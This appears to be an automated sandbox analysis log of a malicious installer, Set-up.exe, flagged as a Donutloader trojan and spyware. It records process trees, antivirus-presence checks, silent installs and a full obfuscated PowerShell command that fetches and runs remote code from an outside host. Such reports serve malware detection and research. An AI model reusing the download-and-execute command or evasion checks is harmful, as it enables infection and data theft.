              Source: Set-up.exe, 00000000.00000003.2244357898.0000000003854000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2243479751.000000000385B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2257110235.000000000399B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2254967557.0000000003857000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2255517886.000000000385F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2258278313.0000000003862000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2242132252.0000000003938000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2254399477.0000000003857000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2255676218.000000000398D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2253316872.0000000003A83000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2242454901.0000000003942000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2254023215.0000000003977000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2251268166.0000000003954000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2246639052.000000000395F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2254817586.0000000003976000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2255824903.000000000385D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2241850695.000000000393D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2254270801.0000000003982000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2252315407.0000000003857000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2241727749.0000000003855000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2252531486.0000000003958000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2256263442.0000000003859000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2253495165.0000000003863000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2250937471.0000000003859000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2247897368.000000000385F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2255372655.0000000003AB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2243700522.000000000394D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2256944932.000000000385D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2249336883.0000000003956000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2258797140.0000000003B00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2243028644.000000000394B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2243280013.0000000003A43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2258562798.00000000039AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000000.2008160274.0000000000499000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename7za.exe, vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2252100226.0000000003A5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2242286823.0000000003854000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2258080220.0000000003AEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2258990958.0000000003856000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2245407143.0000000003861000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2109101050.0000000002821000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7za.exe, vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2253668051.0000000003975000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2252746313.0000000003A66000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2256757804.00000000039A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2255961008.0000000003990000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2242617918.0000000003A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exe, 00000000.00000003.2257576660.0000000003859000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileNameColorStreamLib.exe vs Set-up.exe
              Source: Set-up.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 00000000.00000002.2311039336.0000000000680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@59/15@4/3
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00680B71 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,0_2_00680B71
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLibJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5296:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5948:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3716:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1680:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6448:120:WilError_03
              Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeJump to behavior
              Source: Set-up.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
              Source: Set-up.exe, 00000000.00000003.2144163996.0000000003552000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2132973336.00000000034D5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2143885609.00000000034B8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2133223443.00000000034BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Users\user\Desktop\Set-up.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5x
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe "C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe"
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeProcess created: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp "C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp" /SL5="$80070,7785838,845824,C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe "C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe" /VERYSILENT
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeProcess created: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp "C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp" /SL5="$90070,7785838,845824,C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe" /VERYSILENT
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9
              Source: C:\Windows\System32\timeout.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; 5xJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe "C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeProcess created: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp "C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmp" /SL5="$80070,7785838,845824,C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-P1HG2.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe "C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe" /VERYSILENTJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exeProcess created: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp "C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmp" /SL5="$90070,7785838,845824,C:\Users\user\AppData\Local\Temp\9ONHJ3I0NWFBK4Q0S62.exe" /VERYSILENTJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9 Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-CLL49.tmp\9ONHJ3I0NWFBK4Q0S62.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ncrypt.dllJump to behavior
